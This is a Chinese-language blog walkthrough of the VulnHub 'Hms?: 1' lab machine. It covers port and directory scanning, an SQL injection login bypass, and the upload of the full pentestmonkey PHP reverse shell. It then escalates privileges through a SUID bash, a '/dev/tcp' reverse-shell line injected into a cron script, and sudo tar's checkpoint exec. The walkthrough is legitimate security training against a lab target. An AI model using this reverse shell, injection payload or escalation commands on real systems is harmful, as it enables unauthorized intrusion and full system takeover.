vulhub系列-66-Hms?: 1(超详细)

张开发
2026/4/17 3:35:00 15 分钟阅读

最新文章

推荐文章

相关文章

分享文章

vulhub系列-66-Hms?: 1(超详细)
免责声明本文记录的是 Hms?: 1 渗透测试靶机 的解题过程所有操作均在 本地授权环境 中进行。内容仅供 网络安全学习与防护研究 使用请勿用于任何非法用途。读者应遵守《网络安全法》及相关法律法规自觉维护网络空间安全。环境 https://download.vulnhub.com/hms/niveK.ova一、信息收集1、探测目标IP地址arp-scan -l #探测当前网段的所有ip地址┌──(root㉿kali)-[~] └─# arp-scan -l Interface: eth0, type: EN10MB, MAC: 08:00:27:63:b0:05, IPv4: 192.168.5.5 Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.5.1 0a:00:27:00:00:04 (Unknown: locally administered) 192.168.5.2 08:00:27:f0:0f:f2 PCS Systemtechnik GmbH 192.168.5.6 08:00:27:5a:02:ea PCS Systemtechnik GmbH ​ 3 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 1.928 seconds (132.78 hosts/sec). 3 responded ​nmap -sP 192.168.5.0/24┌──(root㉿kali)-[~] └─# nmap -sP 192.168.5.0/24 Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-22 01:52 -0400 Nmap scan report for 192.168.5.1 Host is up (0.00014s latency). MAC Address: 0A:00:27:00:00:04 (Unknown) Nmap scan report for 192.168.5.2 Host is up (0.00021s latency). MAC Address: 08:00:27:F0:0F:F2 (Oracle VirtualBox virtual NIC) Nmap scan report for 192.168.5.6 Host is up (0.00019s latency). MAC Address: 08:00:27:5A:02:EA (Oracle VirtualBox virtual NIC) Nmap scan report for 192.168.5.5 Host is up. Nmap done: 256 IP addresses (4 hosts up) scanned in 3.01 seconds目标IP192.168.5.62、探测目标IP开放端口nmap -sV -p- 192.168.5.6┌──(root㉿kali)-[~] └─# nmap -sV -p- 192.168.5.6 Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-22 01:53 -0400 Nmap scan report for 192.168.5.6 Host is up (0.00016s latency). Not shown: 65532 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0) 7080/tcp open http Apache httpd 2.4.48 ((Unix) OpenSSL/1.1.1k PHP/7.3.29 mod_perl/2.0.11 Perl/v5.32.1) MAC Address: 08:00:27:5A:02:EA (Oracle VirtualBox virtual NIC) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel ​ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 244.06 seconds ​端口21、22、70803、目录探测gobuster dir -u http://192.168.5.6:7080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php┌──(root㉿kali)-[~] └─# gobuster dir -u http://192.168.5.6:7080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php Gobuster v3.8 by OJ Reeves (TheColonial) Christian Mehlmauer (firefart) [] Url: http://192.168.5.6:7080 [] Method: GET [] Threads: 10 [] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [] Negative Status codes: 404 [] User Agent: gobuster/3.8 [] Extensions: php [] Timeout: 10s Starting gobuster in directory enumeration mode /index.php (Status: 302) [Size: 14041] [-- login.php] /login.php (Status: 200) [Size: 4087] /files (Status: 301) [Size: 238] [-- http://192.168.5.6:7080/files/] /profile.php (Status: 302) [Size: 13736] [-- login.php] /pages (Status: 301) [Size: 238] [-- http://192.168.5.6:7080/pages/] /header.php (Status: 200) [Size: 4924] /signup.php (Status: 200) [Size: 6514] /footer.php (Status: 200) [Size: 1783] /test.php (Status: 200) [Size: 6] /logout.php (Status: 200) [Size: 48] /head.php (Status: 200) [Size: 1741] /connect.php (Status: 200) [Size: 1] /sidebar.php (Status: 200) [Size: 2238] /forgot_password.php (Status: 200) [Size: 5614] /department.php (Status: 302) [Size: 13653] [-- login.php] /medicine.php (Status: 302) [Size: 13972] [-- login.php] /doctor.php (Status: 302) [Size: 16844] [-- login.php] /phpmyadmin (Status: 403) [Size: 1189] /treatment.php (Status: 302) [Size: 13963] [-- login.php] /setting.php (Status: 302) [Size: 16372] [-- login.php] /appointment.php (Status: 302) [Size: 16267] [-- login.php] /changepassword.php (Status: 302) [Size: 13858] [-- login.php] /patient.php (Status: 302) [Size: 18076] [-- login.php] Progress: 441116 / 441116 (100.00%) Finished 二、漏洞利用1、SQL注入访问http://192.168.5.6:7080/login.php查看网页源代码其页面源代码中有备注-- for any PHP, Codeignitor or Laravel work contact me at mayuri.infospacegmail.com可以看到在网页前端对email框做了限制 : typeemail删除这个属性用载荷:admin or 11#即可成功登录删除后登录成功登陆成功了。查看网站内的信息1、发现了文件上传的路径a hrefdashboard.php div classtext-center image classprofile-img srcuploadImage/Logo/logo for hospital system.jpg stylewidth: 50%/image /div /a2、发现了一个 settings.php 页面!-- li class a hrefsetting.php span classpcoded-miconi classfeather icon-bookmark/i/span span classpcoded-mtextSettings/span /a /li --并且还发现了一个 settings.php 页面查看一下访问setting.php页面2、文件上传浏览器上传可以看到我们可以通过这个页面上传文件也就是我们的shell脚本。?php // php-reverse-shell - A Reverse Shell implementation in PHP // Copyright (C) 2007 pentestmonkeypentestmonkey.net // // This tool may be used for legal purposes only. Users take full responsibility // for any actions performed using this tool. The author accepts no liability // for damage caused by this tool. If these terms are not acceptable to you, then // do not use this tool. // // In all other respects the GPL version 2 applies: // // This program is free software; you can redistribute it and/or modify // it under the terms of the GNU General Public License version 2 as // published by the Free Software Foundation. // // This program is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License along // with this program; if not, write to the Free Software Foundation, Inc., // 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. // // This tool may be used for legal purposes only. Users take full responsibility // for any actions performed using this tool. If these terms are not acceptable to // you, then do not use this tool. // // You are encouraged to send comments, improvements or suggestions to // me at pentestmonkeypentestmonkey.net // // Description // ----------- // This script will make an outbound TCP connection to a hardcoded IP and port. // The recipient will be given a shell running as the current user (apache normally). // // Limitations // ----------- // proc_open and stream_set_blocking require PHP version 4.3, or 5 // Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows. // Some compile-time options are needed for daemonisation (like pcntl, posix). These are rarely available. // // Usage // ----- // See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck. set_time_limit (0); $VERSION 1.0; $ip 192.168.5.5; // CHANGE THIS $port 6666; // CHANGE THIS $chunk_size 1400; $write_a null; $error_a null; $shell uname -a; w; id; /bin/sh -i; $daemon 0; $debug 0; // // Daemonise ourself if possible to avoid zombies later // // pcntl_fork is hardly ever available, but will allow us to daemonise // our php process and avoid zombies. Worth a try... if (function_exists(pcntl_fork)) { // Fork and have the parent process exit $pid pcntl_fork(); if ($pid -1) { printit(ERROR: Cant fork); exit(1); } if ($pid) { exit(0); // Parent exits } // Make the current process a session leader // Will only succeed if we forked if (posix_setsid() -1) { printit(Error: Cant setsid()); exit(1); } $daemon 1; } else { printit(WARNING: Failed to daemonise. This is quite common and not fatal.); } // Change to a safe directory chdir(/); // Remove any umask we inherited umask(0); // // Do the reverse shell... // // Open reverse connection $sock fsockopen($ip, $port, $errno, $errstr, 30); if (!$sock) { printit($errstr ($errno)); exit(1); } // Spawn shell process $descriptorspec array( 0 array(pipe, r), // stdin is a pipe that the child will read from 1 array(pipe, w), // stdout is a pipe that the child will write to 2 array(pipe, w) // stderr is a pipe that the child will write to ); $process proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) { printit(ERROR: Cant spawn shell); exit(1); } // Set everything to non-blocking // Reason: Occsionally reads will block, even though stream_select tells us they wont stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); printit(Successfully opened reverse shell to $ip:$port); while (1) { // Check for end of TCP connection if (feof($sock)) { printit(ERROR: Shell connection terminated); break; } // Check for end of STDOUT if (feof($pipes[1])) { printit(ERROR: Shell process terminated); break; } // Wait until a command is end down $sock, or some // command output is available on STDOUT or STDERR $read_a array($sock, $pipes[1], $pipes[2]); $num_changed_sockets stream_select($read_a, $write_a, $error_a, null); // If we can read from the TCP socket, send // data to processs STDIN if (in_array($sock, $read_a)) { if ($debug) printit(SOCK READ); $input fread($sock, $chunk_size); if ($debug) printit(SOCK: $input); fwrite($pipes[0], $input); } // If we can read from the processs STDOUT // send data down tcp connection if (in_array($pipes[1], $read_a)) { if ($debug) printit(STDOUT READ); $input fread($pipes[1], $chunk_size); if ($debug) printit(STDOUT: $input); fwrite($sock, $input); } // If we can read from the processs STDERR // send data down tcp connection if (in_array($pipes[2], $read_a)) { if ($debug) printit(STDERR READ); $input fread($pipes[2], $chunk_size); if ($debug) printit(STDERR: $input); fwrite($sock, $input); } } fclose($sock); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); // Like print, but does nothing if weve daemonised ourself // (I cant figure out how to redirect STDOUT like a proper daemon) function printit ($string) { if (!$daemon) { print $string\n; } } ?上传后触发上传路径http://192.168.5.6:7080/uploadImage/Logo/http://192.168.5.6:7080/uploadImage/Logo/Pshell.phpkali监听nc -lvnp 6666反弹成功┌──(root㉿kali)-[~] └─# nc -lvnp 6666 listening on [any] 6666 ... connect to [192.168.5.5] from (UNKNOWN) [192.168.5.6] 53910 Linux nivek 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux 14:00:59 up 28 min, 0 users, load average: 0.10, 1.73, 1.35 USER TTY FROM LOGIN IDLE JCPU PCPU WHAT uid1(daemon) gid1(daemon) groups1(daemon) /bin/sh: 0: cant access tty; job control turned off $三、权限提升1、切换为bashpython -c import pty; pty.spawn(/bin/bash)$ $ $ python -c import pty; pty.spawn(/bin/bash) daemonnivek:/$ daemonnivek:/$2、查看当前系统有什么用户daemonnivek:/$ cd /home cd /home daemonnivek:/home$ daemonnivek:/home$ ls -la ls -la total 16 drwxr-xr-x 4 root root 4096 Jul 26 2021 . drwxr-xr-x 23 root root 4096 Mar 22 13:40 .. drwx-----x 4 eren eren 4096 Jul 26 2021 eren drwxr-xr-x 16 nivek nivek 4096 Jul 26 2021 nivek daemonnivek:/home$ daemonnivek:/home$3、查看一下可执行的文件find / -perm -4000 -type f -exec ls -al {} \; 2/dev/nulldaemonnivek:/home$ find / -perm -4000 -type f -exec ls -al {} \; 2/dev/null find / -perm -4000 -type f -exec ls -al {} \; 2/dev/null -rwsr-xr-x 1 root root 44168 May 8 2014 /bin/ping -rwsr-xr-x 1 root root 40152 Apr 14 2016 /bin/mount -rwsr-xr-x 1 root root 30800 Mar 11 2016 /bin/fusermount -rwsr-xr-x 1 root root 40128 May 17 2017 /bin/su -rwsr-xr-x 1 root root 44680 May 8 2014 /bin/ping6 -rwsr-xr-x 1 root root 27608 Apr 14 2016 /bin/umount -rwsr-xr-x 1 root root 49584 May 17 2017 /usr/bin/chfn -rwsr-xr-x 1 root root 136808 Mar 31 2016 /usr/bin/sudo -rwsr-xr-x 1 root root 32944 May 17 2017 /usr/bin/newgidmap -rwsr-xr-x 1 eren eren 1037464 Jul 26 2021 /usr/bin/bash -rwsr-xr-x 1 root root 54256 May 17 2017 /usr/bin/passwd -rwsr-xr-x 1 root root 23376 Mar 27 2019 /usr/bin/pkexec -rwsr-xr-x 1 root root 39904 May 17 2017 /usr/bin/newgrp -rwsr-xr-x 1 root root 40432 May 17 2017 /usr/bin/chsh -rwsr-sr-x 1 daemon daemon 51464 Jan 15 2016 /usr/bin/at -rwsr-xr-x 1 root root 32944 May 17 2017 /usr/bin/newuidmap -rwsr-xr-x 1 root root 75304 May 17 2017 /usr/bin/gpasswd -rwsr-xr-x 1 root root 10232 Mar 27 2017 /usr/lib/eject/dmcrypt-get-device -rwsr-xr-- 1 root messagebus 42992 Jun 12 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper -rwsr-xr-x 1 root root 38984 Mar 8 2017 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic -rwsr-xr-x 1 root root 110792 Feb 8 2021 /usr/lib/snapd/snap-confine -rwsr-xr-x 1 root root 428240 May 27 2020 /usr/lib/openssh/ssh-keysign -rwsr-xr-x 1 root root 14864 Mar 27 2019 /usr/lib/policykit-1/polkit-agent-helper-1 -rwsr-xr-- 1 root dip 394984 Jul 23 2020 /usr/sbin/pppd -rwsr-xr-x 1 root root 14704 Jul 7 2021 /opt/lampp/bin/suexec daemonnivek:/home$发现可以执行 /bin/bash那就可以切换用户/usr/bin/bash -pdaemonnivek:/home$ /usr/bin/bash -p /usr/bin/bash -p bash-4.3$成功切换到 eren 用户查看权限也查看不了不过在定时任务中有发现bash-4.3$ cat /etc/crontab cat /etc/crontab # /etc/crontab: system-wide crontab # Unlike any other crontab you dont have to run the crontab # command to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do. SHELL/bin/sh PATH/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin # m h dom mon dow user command 17 * * * * root cd / run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / run-parts --report /etc/cron.monthly ) # */5 * * * * eren /home/eren/backup.sh bash-4.3$查看/home/eren/backup.shcat /home/eren/backup.shbash-4.3$ cat /home/eren/backup.sh cat /home/eren/backup.sh #!/bin/bash BACKUP_DIR/home/eren/backups tar -zcvpf $BACKUP_DIR/backup.tar.gz /var/www/html bash-4.3$发现每隔五分钟运行一次可以用它来提权在 /home/eren/backup.sh 中写入 shellecho bash -i /dev/tcp/192.168.5.5/1235 01 /home/eren/backup.shbash-4.3$ echo bash -i /dev/tcp/192.168.5.5/1235 01 /home/eren/backup.sh /dev/tcp/192.168.5.5/1235 01 /home/eren/backup.sh bash-4.3$ bash-4.3$kali 02监听nc -lvnp 1235大概要等5分钟才会收到反弹shell4、查看权限erennivek:~$ sudo -l sudo -l Matching Defaults entries for eren on nivek: env_reset, mail_badpass, secure_path/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User eren may run the following commands on nivek: (root) NOPASSWD: /bin/tar erennivek:~$发现以可以用 tar 进行提权5、提权sudo tar -cf /dev/null /dev/null --checkpoint1 --checkpoint-actionexec/bin/sherennivek:~$ sudo tar -cf /dev/null /dev/null --checkpoint1 --checkpoint-actionexec/bin/sh /dev/null /dev/null --checkpoint1 --checkpoint-actionexec/bin/sh tar: Removing leading / from member names id uid0(root) gid0(root) groups0(root) ​ cd /root ​ ls Desktop Documents Downloads Music Pictures Public root.txt Templates Videos ​ cat root.txt 299c10117c1940f21b70a391ca125c5d ​

更多文章